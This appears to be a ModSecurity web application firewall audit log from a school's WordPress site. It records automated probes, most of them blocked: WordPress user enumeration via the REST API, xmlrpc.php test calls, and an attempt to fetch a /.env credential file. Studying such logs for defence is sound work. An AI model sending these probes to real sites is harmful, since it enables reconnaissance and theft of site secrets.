--28757977-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873451100993 4904 (- - -) Stopwatch2: 1746873451100993 4904; combined=3869, p1=487, p2=3178, p3=23, p4=27, p5=90, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28757977-Z-- --8d083e70-A-- [10/May/2025:17:37:41 +0700] aB8sdRLuBiaF9R054QCrlgAAABc 103.236.140.4 36144 103.236.140.4 8181 --8d083e70-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d083e70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d083e70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873461795145 2843 (- - -) Stopwatch2: 1746873461795145 2843; combined=1273, p1=447, p2=788, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d083e70-Z-- --404ef52b-A-- [10/May/2025:17:37:43 +0700] aB8sdxLuBiaF9R054QCrlwAAABU 103.236.140.4 36146 103.236.140.4 8181 --404ef52b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --404ef52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --404ef52b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873463069618 2090 (- - -) Stopwatch2: 1746873463069618 2090; combined=982, p1=310, p2=639, p3=0, p4=0, p5=32, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --404ef52b-Z-- --60e88327-A-- [10/May/2025:17:37:50 +0700] aB8sfhLuBiaF9R054QCrmgAAAAI 103.236.140.4 36152 103.236.140.4 8181 --60e88327-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --60e88327-C-- demo.sayHello --60e88327-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --60e88327-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873470912769 5008 (- - -) Stopwatch2: 1746873470912769 5008; combined=3772, p1=441, p2=3124, p3=22, p4=26, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60e88327-Z-- --74f7ce4c-A-- [10/May/2025:17:37:52 +0700] aB8sgBLuBiaF9R054QCrmwAAAAA 103.236.140.4 36154 103.236.140.4 8181 --74f7ce4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --74f7ce4c-C-- demo.sayHello --74f7ce4c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --74f7ce4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873472012819 5884 (- - -) Stopwatch2: 1746873472012819 5884; combined=4258, p1=578, p2=3459, p3=30, p4=35, p5=93, sr=93, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74f7ce4c-Z-- --d080dd6c-A-- [10/May/2025:17:38:38 +0700] aB8srsi6w7GTj2w44Z7msgAAANQ 103.236.140.4 36166 103.236.140.4 8181 --d080dd6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d080dd6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d080dd6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873518404191 2820 (- - -) Stopwatch2: 1746873518404191 2820; combined=1231, p1=424, p2=778, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d080dd6c-Z-- --8dab3669-A-- [10/May/2025:17:38:44 +0700] aB8stBLuBiaF9R054QCroQAAAAY 103.236.140.4 36170 103.236.140.4 8181 --8dab3669-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8dab3669-C-- demo.sayHello --8dab3669-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dab3669-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873524673291 4659 (- - -) Stopwatch2: 1746873524673291 4659; combined=3651, p1=429, p2=3023, p3=23, p4=24, p5=89, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dab3669-Z-- --970d5205-A-- [10/May/2025:17:39:17 +0700] aB8s1RLuBiaF9R054QCrtgAAABI 103.236.140.4 36218 103.236.140.4 8181 --970d5205-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --970d5205-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --970d5205-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873557494343 2267 (- - -) Stopwatch2: 1746873557494343 2267; combined=1189, p1=399, p2=762, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --970d5205-Z-- --70dfd43e-A-- [10/May/2025:17:39:20 +0700] aB8s2BLuBiaF9R054QCrugAAAAE 103.236.140.4 36226 103.236.140.4 8181 --70dfd43e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --70dfd43e-C-- demo.sayHello --70dfd43e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --70dfd43e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873560776344 5153 (- - -) Stopwatch2: 1746873560776344 5153; combined=4022, p1=480, p2=3331, p3=28, p4=31, p5=90, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70dfd43e-Z-- --1ca5b442-A-- [10/May/2025:17:39:30 +0700] aB8s4si6w7GTj2w44Z7mswAAAMk 103.236.140.4 36258 103.236.140.4 8181 --1ca5b442-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1ca5b442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ca5b442-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873570590451 2388 (- - -) Stopwatch2: 1746873570590451 2388; combined=1233, p1=398, p2=806, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ca5b442-Z-- --19a6c17b-A-- [10/May/2025:17:39:41 +0700] aB8s7dr9PbfRBMhzxmSiqQAAAEI 103.236.140.4 36282 103.236.140.4 8181 --19a6c17b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.93 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19a6c17b-C-- demo.sayHello --19a6c17b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19a6c17b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873581428311 5525 (- - -) Stopwatch2: 1746873581428311 5525; combined=4437, p1=546, p2=3688, p3=33, p4=37, p5=78, sr=72, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a6c17b-Z-- --a340f84e-A-- [10/May/2025:17:58:26 +0700] aB8xUsi6w7GTj2w44Z7nBwAAAMQ 103.236.140.4 37596 103.236.140.4 8181 --a340f84e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.62.21.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.62.21.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a340f84e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a340f84e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746874706820826 2765 (- - -) Stopwatch2: 1746874706820826 2765; combined=1251, p1=445, p2=775, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a340f84e-Z-- --d57a507d-A-- [10/May/2025:18:30:11 +0700] aB84wxLuBiaF9R054QCtewAAAAY 103.236.140.4 38114 103.236.140.4 8181 --d57a507d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d57a507d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d57a507d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746876611059689 2821 (- - -) Stopwatch2: 1746876611059689 2821; combined=1292, p1=428, p2=825, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d57a507d-Z-- --eead165a-A-- [10/May/2025:18:30:16 +0700] aB84yBLuBiaF9R054QCtfQAAAAo 103.236.140.4 38118 103.236.140.4 8181 --eead165a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eead165a-C-- demo.sayHello --eead165a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eead165a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746876616479135 4680 (- - -) Stopwatch2: 1746876616479135 4680; combined=3666, p1=463, p2=3009, p3=22, p4=22, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eead165a-Z-- --6332d251-A-- [10/May/2025:18:39:02 +0700] aB861si6w7GTj2w44Z7nJAAAANU 103.236.140.4 38256 103.236.140.4 8181 --6332d251-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 61.247.178.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 61.247.178.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6332d251-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6332d251-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746877142203891 2351 (- - -) Stopwatch2: 1746877142203891 2351; combined=1012, p1=355, p2=631, p3=0, p4=0, p5=26, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6332d251-Z-- --2024044f-A-- [10/May/2025:18:47:10 +0700] aB88vquC4AqLGUOyzyU6UgAAAIA 103.236.140.4 38316 103.236.140.4 8181 --2024044f-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 165.22.235.3 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 165.22.235.3 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2024044f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2024044f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746877630594646 722 (- - -) Stopwatch2: 1746877630594646 722; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2024044f-Z-- --400f2040-A-- [10/May/2025:19:31:06 +0700] aB9HCtr9PbfRBMhzxmSkGAAAAFE 103.236.140.4 39758 103.236.140.4 8181 --400f2040-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.68.24.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.68.24.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --400f2040-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --400f2040-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746880266257179 2777 (- - -) Stopwatch2: 1746880266257179 2777; combined=1233, p1=417, p2=786, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --400f2040-Z-- --f915a52f-A-- [10/May/2025:19:32:14 +0700] aB9HTtr9PbfRBMhzxmSkGQAAAFc 103.236.140.4 39762 103.236.140.4 8181 --f915a52f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.92.189.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.92.189.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f915a52f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f915a52f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 